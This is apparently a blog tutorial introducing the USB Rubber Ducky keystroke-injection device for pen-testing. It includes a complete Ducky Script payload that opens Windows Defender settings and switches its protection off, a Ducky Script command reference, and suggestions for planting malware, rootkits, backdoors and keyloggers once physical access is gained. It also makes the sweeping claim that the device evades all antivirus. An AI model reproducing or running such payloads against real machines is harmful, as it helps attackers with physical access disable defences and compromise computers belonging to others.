Imagine you could walk up to a computer, plug in a seemingly innocent USB drive, and have it install a backdoor, exfiltrate documents, steal passwords or any number of pen-test tasks.
The USB Rubber Ducky does this in seconds. It violates the inherent trust computers have in humans by posing as a keyboard - and injecting keystrokes at superhuman speeds.
This 45$ tool has changed the physical aspect of hacking since it was released, and accompanied by its easy to use scripting language, it has been used to pen-test banks, power stations, corporations, networks, factories, office and home PCs, and what not.
The USB rubber ducky is a cross platform tool, and since it poses as a keyboard, it is undetectable by any antivirus software.
There are quite a lot of payload scripts for the Rubber Ducky already available on hak5’s GitHub page- https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Below is a screen grab of the available scripts
The Ducky is actually an integrated processor with a USB connector and an SD card.
So you’ve got physical access and a rubber ducky… What can you do? You can plant Malware, rootkits, backdoors, key loggers your entire imagination.
So how do you use the USB Rubber Ducky???
Here’s a site with detailed instructions on the setup and installation process.
After downloading the duck encoder, we create an inject.bin file where we type our script. Here’s a short script to print “Hello World” on notepad
Want something more advanced…
Try disabling windows defender
DELAY 2000
ESCAPE
DELAY 100
CONTROL ESCAPE
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 2000
TAB
ENTER
TAB
TAB
TAB
ENTER
SPACE
LEFT
ENTER
DELAY 50
ALT F4
DELAY 3200
GUI a
Here’s a guide to writing scripts for the ducky
Script Commands:
ALT [key name] (ex: ALT F4, ALT SPACE) CTRL | CONTROL [key name] (ex: CTRL ESC) CTRL-ALT [key name] (ex: CTRL-ALT DEL) CTRL-SHIFT [key name] (ex: CTRL-SHIFT ESC) DEFAULT_DELAY | DEFAULTDELAY [Time in millisecond * 10] (change the delay between each command) DELAY [Time in millisecond * 10] (used to overide temporary the default delay) GUI | WINDOWS [key name] (ex: GUI r, GUI l) REM [anything] (used to comment your code, no obligation :) ) ALT-SHIFT (swap language) SHIFT [key name] (ex: SHIFT DEL) STRING [any character of your layout] REPEAT [Number] (Repeat last instruction N times) [key name] (anything in the keyboard.properties)Visit this link for more instructions https://github.com/hak5darren/USB-Rubber-Ducky/wiki/DuckyscriptHELPFUL LINKS
Comments